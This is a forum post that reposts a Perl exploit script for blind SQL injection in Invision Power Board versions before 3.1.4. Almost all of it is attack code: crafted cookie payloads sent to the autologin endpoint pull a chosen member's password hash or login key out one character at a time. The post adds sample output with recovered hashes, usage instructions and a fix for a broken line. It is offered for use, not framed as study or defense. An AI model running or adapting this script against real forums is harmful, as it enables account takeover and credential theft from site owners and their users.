Kev Posted March 23, 2020 Report Posted March 23, 2020 SQL Injection Exploit !/usr/bin/perl ## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX ## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4) ## tested on version 1 Final and version 3.1.4 ## * work on all mysql versions ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On) ## (c)oded by 1dt.w0lf ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## screen: ## ~~~~~~~ ## r57ipb3.pl blah.com /ipb13/ 1 0 ## [~] SERVER : blah.com ## [~] PATH : /ipb13/ ## [~] MEMBER ID : 1 ## [~] TARGET : 0 - IPB 1.* ## [~] SEARCHING PASSWORD ... [ DONE ] ## ## MEMBER ID : 1 ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99 ## ## r57ipb3.pl blah.com /ipb314/ 1 1 ## [~] SERVER : blah.com ## [~] PATH : /ipb314/ ## [~] MEMBER ID : 1 ## [~] TARGET : 1 - IPB 2.* ## [~] SEARCHING PASSWORD ... [ DONE ] ## ## MEMBER ID : 1 ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d ## ## r57ipb3.pl blah.com /ipb314/ 1 1 ## [~] SERVER : blah.com ## [~] PATH : /ipb314/ ## [~] MEMBER ID : 1 ## [~] TARGET : 1 - IPB 3.* ## [~] SEARCHING PASSWORD ... [ DONE ] ## ## MEMBER ID : 1 ## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ use IO :: Socket ; if (@ ARGV < 4 ) { & usage ; } $server = $ARGV [ 0 ]; $path = $ARGV [ 1 ]; $member_id = $ARGV [ 2 ]; $target = $ARGV [ 3 ]; $pass = ( $target )?( 'member_login_key' ):( 'password' ); $server =~ s !( http :\/\/)!!; $request = 'http://' ; $request .= $server ; $request .= $path ; $s_num = 1 ; $|++; $n = 0 ; print "[~] SERVER : $server \r\n" ; print "[~] PATH : $path \r\n" ; print "[~] MEMBER ID : $member_id \r\n" ; print "[~] TARGET : $target " ; print (( $target )?( ' - IPB 3.*' ):( ' - IPB 2.*' ):( ' - IPB 1.*' )); print "\r\n" ; print "[~] SEARCHING PASSWORD ... [|]" ; ( $cmember_id = $member_id ) =~ s /(.)/ "%" . uc ( sprintf ( "%2.2x" , ord ($ 1 )))/ eg ; while( 1 ) { if(& found ( 47 , 58 )== 0 ) { & found ( 96 , 122 ); } $char = $i ; if ( $char == "0" ) { if( length ( $allchar ) > 0 ){ print qq {\ b \ b DONE ] MEMBER ID : $member_id }; print (( $target )?( 'MEMBER_LOGIN_KEY : ' ):( 'PASSWORD : ' )); print $allchar . "\r\n" ; } else { print "\b\b FAILED ]" ; } exit(); } else { $allchar .= chr ( 42 ); } $s_num ++; } sub found ($$) { my $fmin = $_ [ 0 ]; my $fmax = $_ [ 1 ]; if (( $fmax - $fmin )< 5 ) { $i = crack ( $fmin , $fmax ); return $i ; } $r = int ( $fmax - ( $fmax - $fmin )/ 2 ); $check = " BETWEEN $r AND $fmax " ; if ( & check ( $check ) ) { & found ( $r , $fmax ); } else { & found ( $fmin , $r ); } } sub crack ($$) { my $cmin = $_ [ 0 ]; my $cmax = $_ [ 1 ]; $i = $cmin ; while ( $i < $cmax ) { $crcheck = "= $i " ; if ( & check ( $crcheck ) ) { return $i ; } $i ++; } $i = 0 ; return $i ; } sub check ($) { $n ++; status (); $ccheck = $_ [ 0 ]; $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D" ; $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28" ; $pass_hash3 = $pass . "," . $s_num . ",1))" . $ccheck . ") /*" ; $pass_hash3 =~ s /(.)/ "%" . uc ( sprintf ( "%2.2x" , ord ($ 1 )))/ eg ; $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20" ; $socket = IO :: Socket :: INET -> new ( Proto => "tcp" , PeerAddr => " $server " , PeerPort => "80" ); printf $socket ( "GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n" , $path , $server , $cmember_id , $pass_hash1 , $cmember_id , $pass_hash2 , $pass_hash3 , $nmalykh ); while(< $socket >) { if (/ Set - Cookie : session_id = 0 ;/) { return 1 ; } } return 0 ; } sub status () { $status = $n % 5 ; if( $status == 0 ){ print "\b\b/]" ; } if( $status == 1 ){ print "\b\b-]" ; } if( $status == 2 ){ print "\b\b\\]" ; } if( $status == 3 ){ print "\b\b|]" ; } } sub usage () { print q ( Invision Power Board v < 3.1.4 SQL injection exploit ---------------------------------------------------- USAGE : ~~~~~~ r57ipb3 . pl [ server ] [/ folder /] [ member_id ] [ target ] [ server ] - host where IPB installed [/ folder /] - folder where IPB installed [ member_id ] - user id for brute targets : 0 - IPB 1. * 1 - IPB 2. * 2 - IPB 3. * ( Prior To 3.1.4 ) e . g . r57ipb3 . pl 127.0.0.1 / IPB / 1 1 ---------------------------------------------------- ( c ) oded by 1dt . w0lf RST / GHC , http : //rst.void.ru , http://ghc.ru ); exit(); For convenience, change 72 line to print $target ( ' - IPB 3.*' ); Source Quote
